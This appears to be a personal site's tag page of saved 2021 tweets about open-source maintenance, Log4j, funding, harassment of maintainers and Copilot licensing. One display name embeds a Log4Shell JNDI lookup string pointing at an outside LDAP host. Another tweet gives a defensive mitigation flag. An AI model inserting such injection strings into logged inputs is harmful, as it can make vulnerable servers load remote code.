Tag open-source
Post details
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? apache.org/dev/pmc.html Open Source needs to grow the hell up. Yesterday.Post details
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
Post details
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them.
Post details
If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit. -Dlog4j2.formatMsgNoLookups=true lnkd.in/gHmEFJ9w #Java #Security #InfosecBruno Borges (@brunoborges)Fri, 10 Dec 2021 06:07 GMT
Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT
Post details
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Post details
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them. twitter.com/brunoborges/st…Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT
Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
Post details
This is the kind of shit open-source maintainers and visible community members deal with _constantly_. I spend a lot of my time teaching people about Kubernetes and ops stuff, possibly too much time. But I do it on my terms. Maintainers don't owe you training.
Noah Kantrowitz (@kantrn)Wed, 01 Dec 2021 21:20 GMT
Post details
So you want for fork Electron. This is not for the faint of heart, but I will tell you what you need to do.Jacob 🌎💧🍁☀️ (@0x606)Wed, 24 Nov 2021 17:59 GMT
Post details
Sometimes you go from creator to maintainer to user. This is a valid path and is a healthy one.
Jaana Dogan ヤナ ドガン (@rakyll)Mon, 08 Nov 2021 20:53 GMT
Post details
A quick definition of Open-Source
Fabien Potencier (@fabpot)Thu, 04 Nov 2021 08:26 GMT
You mean source available, not Open Source?
Post details
Want it to be open source? Great! Go for it. Want it to have all the upsides of open source, and none of the side effects that might make you uncomfortable? Get the fuck right out of town with that. The upside of being open should come with the potential for others to benefit.
Adam Jacob (@adamhjk)Fri, 05 Nov 2021 15:40 GMT
Post details
I don’t think people realise just how prevalent this sort of thing is… We get them to the Django board all the time too. We’re all volunteers, and it can take a toll. twitter.com/mikemcquaid/st…Post details
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew releaseMike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
Aaron Bassett - 🥑🪐 (@aaronbassett)Wed, 27 Oct 2021 13:45 +0000
Post details
Still blows my mind how people increasingly think the answer to their OSS problems is to harass and abuse the maintainers (aka who can fix their problems). The abuse gets exponentially worse towards non white/cis/men maintainers. This is the “normal”. OSS is broken. twitter.com/mikemcquaid/st…Post details
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew releaseMike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
Emily Kager (@EmilyKager)Wed, 27 Oct 2021 18:30 +0000
Post details
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew releaseMike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
I'm very happy to step up - it's a great plugin and I'd love to help continue the great work that @daspilker has done over the years 👏🏽
Post details
Thanks to @JamieTanna for stepping up up as a @jenkinsci JobDSL plugin maintainer! And kudos to @daspilker for leading it for almost ten years 🙇 JobDSL is one of the well documented and stable plugins and it is also essential for the configuration as code ecosystem in JenkinsPost details
Just to update on this - I'm a maintainer now, it's been released as 1.78 this morning, and I'll see over the coming weeks if there's anything other high-priority to ship 🚀 (jvt.me/mf2/2021/10/jy…)
Jamie Tanna | www.jvt.me (@JamieTanna)Wed, 27 Oct 2021 09:54 +0000
Oleg Nenashev (@oleg_nenashev)Wed, 27 Oct 2021 10:11 +0000
Post details
Thanks to @JamieTanna for stepping up up as a @jenkinsci JobDSL plugin maintainer! And kudos to @daspilker for leading it for almost ten years 🙇 JobDSL is one of the well documented and stable plugins and it is also essential for the configuration as code ecosystem in JenkinsPost details
Just to update on this - I'm a maintainer now, it's been released as 1.78 this morning, and I'll see over the coming weeks if there's anything other high-priority to ship 🚀 (jvt.me/mf2/2021/10/jy…)
Jamie Tanna | www.jvt.me (@JamieTanna)Wed, 27 Oct 2021 09:54 +0000
Oleg Nenashev (@oleg_nenashev)Wed, 27 Oct 2021 10:11 +0000
Post details
GitHub isn't Open Source, and it's acquisition by Microsoft was not proof of their commitment to Open Source as a movement. There are other things that indicate a meaningful change in respect of the movement. ASOP is an "Open Source Project" in name and software license only.Matthew S. Wilson (msw) (@_msw_)Sun, 24 Oct 2021 18:15 +0000
Post details
Every open source maintainer upon realizing tomorrow is October…
Devon Govett (@devongovett)Fri, 01 Oct 2021 03:02 +0000
Post details
Using this
🧗♂️ Matt Holt (@mholt6)Fri, 01 Oct 2021 05:54 +0000
Post details
An open source project either dies young as a hero or lives long enough to be horribly mismanaged into the ground by a group of big egos with misaligned incentives.
Jamon 🚜 (@jamonholmgren)Thu, 30 Sep 2021 17:02 +0000
Post details
Having worked in open source for a majority of my career now, I can say that the “just send a pull request” meme downplays the cost of software maintenance. Maintainers need to deal with the ramifications of supporting this change when the contributor has moved on #ossDavid Fowler 🇧🇧💉💉 (@davidfowl)Sun, 26 Sep 2021 17:57 +0000
Tips for Reducing Dependency Upgrade Toil with Renovate (5 mins read).
Some tips I've picked up while working with Renovate to keep my projects up-to-date.
Post details
Thanks to the entire Jenkins Infra Team for their evening&weekend work to get it fixed as soon as possible! 🙇
Oleg Nenashev (@oleg_nenashev)Sat, 04 Sep 2021 16:55 +0000
Post details
I am not sure whether Daniel has any bandwidth these days. Last 1.5 have been pretty complicated to anyone, and we need more maintainers in @jenkinsci . Any contributions like reviews and testing would be appreciated, and maybe even adopting the plugin. jenkins.io/doc/developer/…Oleg Nenashev (@oleg_nenashev)Mon, 02 Aug 2021 15:26 +0000
Post details
I ♥ contributing to Open Source. Signing a CLA gives me a sense of pride and accomplishment!Terence Eden (@edent)Mon, 29 Jul 2019 17:51 +0000
Post details
Last several months were rough, but I am finally able to contribute to the projects again. Thanks to all relatives, colleagues and friends for their support! // burnout...Oleg Nenashev (@oleg_nenashev)Tue, 30 Mar 2021 08:00 +0000
Post details
It is... curious to see GitHub listed as a type of #OpenSource software in the State of Open UK Phase 2 report. Yes, git is OSS, but GitHub very much is not.julia ferraioli (@juliaferraioli)Fri, 09 Jul 2021 20:42 +0000
Post details
If your AI processes AGPL licensed source code and thereby incorporates it, is your AI code required to be released to the public? Roll 3d6 and hire that many lawyers.Post details
Anybody else wandering how "machine learning" laundering of copywritten works is going to hold up in court? twitter.com/dmofengineerin…'jamin (@acdimalev)Thu, 08 Jul 2021 18:58 +0000
DM of Engineering (@dmofengineering)Thu, 08 Jul 2021 19:19 +0000
Post details
The maintainer of an audacity fork was PHYSICALLY STABBED by a 4channer after they doxxed him and his family over a naming poll for the new fork: github.com/tenacityteam/t… But again of course nothing will happen because everyone is too chickenshit to take down this cesspoolKatharina 🍉 »Free Palestine« 🇵🇸 Fey (@spacekookie)Wed, 07 Jul 2021 09:50 +0000
Post details
In case it's not clear what's happening here: @github's Copilot "autocompletes" the fast inverse square root implementation from Quake III — which is GPL2+ code. It then autocompletes a BSD2 license comment (with the wrong copyright holder). This is fine.Post details
I don't want to say anything but that's not the right license Mr Copilot.
Armin Ronacher (@mitsuhiko)Fri, 02 Jul 2021 09:01 +0000
Stefan Karpinski (@StefanKarpinski)Fri, 02 Jul 2021 14:38 +0000
Post details
I'd just like to interject for a moment. What you're referring to as Copilot, is in fact, GNU/Copilot, or as I've recently taken to calling it, GNU code trained Copilot. Copilot is not an AI system unto itself, but rather a proprietary component that launders GNU code
Post details
"Once, GitHub Copilot suggested starting an empty file with something it had even seen more than a whopping 700,000 different times during training -- that was the GNU General Public License." docs.github.com/en/github/copi…eevee (@eevee)Wed, 30 Jun 2021 02:49 +0000
Ian Coldwater 📦💥 (@IanColdwater)Thu, 01 Jul 2021 12:25 +0000
Post details
github copilot has, by their own admission, been trained on mountains of gpl code, so i'm unclear on how it's not a form of laundering open source code into commercial works. the handwave of "it usually doesn't reproduce exact chunks" is not very satisfying
eevee (@eevee)Wed, 30 Jun 2021 00:47 +0000
Post details
What's the license of source code generated by GitHub Copilot?
Rich Persaud (@stacktrust)Tue, 29 Jun 2021 15:01 +0000
Post details
throwback to that time a Google recruiter reached out to me after seeing my GitHub profile this was several months ago, but it’s only just dawned on me that they must’ve seen my profile full of abandoned projects and thought “yep, that’s Google material right there” 😂Luna 🏳️🌈 (@lunasorcery)Thu, 10 Jun 2021 16:45 +0000
Post details
Another way to get involved with open source is to write blog posts and unofficial guides, make video tutorials, give talks, provide support. These are things the authors often don't have energy left for, and—unlike code contributions—don't require their time or approval.
🧁🍨 Mark Dalgleish (@markdalgleish)Sat, 05 Jun 2021 12:10 +0000
Post details
According to @travisci's new rules, we're not legible for the open source free tier if anyone in the project gets paid to work on it... Thanks a lot.Daniel Stenberg (@bagder)Sun, 30 May 2021 21:19 +0000
Post details
Elasticsearch relicensing, Freenode implosion, utter lack of FSF accountability: I hope folks are noticing the same pattern I am. Governance is an important factor in risk assessment. How resources are stewarded matters.Josh Simmons (@joshsimmons)Wed, 26 May 2021 18:48 +0000
Post details
Each package.json owner would get to decide how to distribute the funds across its dependencies. They must distribute half of what they got from their dependent and by default it's gets evenly distributed. So, this is recursive with amounts going down with log(k)Malte Ubl (@cramforce)Thu, 13 May 2021 03:55 +0000
Post details
the state of open source funding
Tierney Cyren (@bitandbang)Wed, 12 May 2021 07:53 +0000
Post details
Though you should not expect that giving some dollars will magically solve everything. Sometimes money isn’t what’s lacking, but time, team size, project management –. or simply differences in vision, expectations or similar. Listen to the needs of the project and act on that.Post details
Open source only ensures "freedom", not free beer. If you are expecting those maintainers to provide free support and guaranteed SLAs, you should find a way to pay them. #OpenSource twitter.com/SimpsonsOps/st…Anand Babu Periasamy (@abperiasamy)Thu, 22 Apr 2021 05:09 +0000
Pelle Wessman (@voxpelli)Sun, 25 Apr 2021 14:30 +0000
Post details
Possibly unpopular opinion, but I feel like "only merge things after verifying they are valid" should maybe be the default policy of the most used piece of software in the world.
Filippo Valsorda 💉💉⏳ (@FiloSottile)Wed, 21 Apr 2021 14:45 +0000